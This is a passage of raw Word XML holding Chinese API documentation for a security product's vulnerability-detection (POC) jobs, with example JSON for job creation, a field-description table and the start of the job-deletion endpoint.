      <w:r>
        <w:br/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "name": "liangyong_test",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "cronEnabled": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "status": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "realm": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "agents": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "ff0878fac4add80c"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "type": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "realmName": "全部主机222",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "remark": "ceshi",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "pocTaskCreateParams": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "vulId": "QT042016002534",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "executeTypes": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "params": {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DD96CF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EF4BE1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "id": "5c417ad07d761b3224c4280a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "comId": "59080851823593e1a80b",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "uuid": "59080851823593e1a80b",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "name": "liangyong_test1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "status": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "remark": "ceshi",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "createTime": "2019-01-18 15:05:52",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "updateTime": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "cronEnabled": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "cron": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "cronTaskId": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "realm": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "type": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "groups": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "agents": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "ff0878fac4add80c"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "osTags": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "realmName": "全部主机222",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "lastExecuteTime": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3ED7EB"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753"/>
        <w:gridCol w:w="1006"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="1672"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="0CB6A49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BEE42C3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E841E5C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D8DA270" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D9D75A2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="200FD339" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55D5EFEE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B624F96" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5593E3F7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="259D5698" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>作业id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6FF12EAC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A26E88F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>comId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61B467ED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6103CEDB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A2386A4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>公司id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0F6A25F7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1298684F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>uuid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BE660DC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="501EC0AC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46D25DED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>uuid</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="512BBB47" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="763F388A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7268EEBB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E9B6BA7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(255)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B7DB8E9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>作业名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2B60DD09" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15BC7DB8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B2FB709" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="708DC123" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09375913" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否启用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="15586F0D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E0C5F69" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>createTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BB5215F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6ECE3EBB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79498AA2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>创建时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0604F281" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CA9057C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>updateTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B4455FD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07A3B324" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E1C12AB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>更新时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="610A628B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06D8042D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cronEnabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2824E680" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AAB8029" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10607F90" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否定时</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1DCE2A1F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66736747" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cron</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="744E0780" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7082AB3D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FF0392C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cron任务表达式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="41B65A4E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0932B8A3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cronTaskId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79E202BA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E8F9EA4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16C5EA33" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cronTaskId</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2C8D0F8F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BB32985" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="734C9C38" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D12066E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(256)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="178D8DFE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2C428C46" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A9AA2F6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>realm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="596A922E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6876CE3E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30D31111" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="37B97A21" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="100C1DC4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>realmName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BDEB4DB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69CD086D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79C939C0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行范围名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="13D118ED" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="618F15BC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>lastExecuteTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4941ADA8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77AFD022" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2ED09AD8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>最后执行时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="57B60860" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="120" w:name="漏洞检测作业删除"/>
      <w:bookmarkEnd w:id="119"/>
      <w:r>
        <w:t>漏洞检测作业删除</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6C2144" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3845181A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>DELETE /external/api/vul/poc/job/{linux|win}/{{jobId}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBA7496"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702"/>
        <w:gridCol w:w="760"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="840"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="30D296F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51781DA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71DD3620" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E7250BA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="128FC704" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3C77FE8F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19F5F8D1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>jobId</w:t>
            </w:r>
          </w:p>
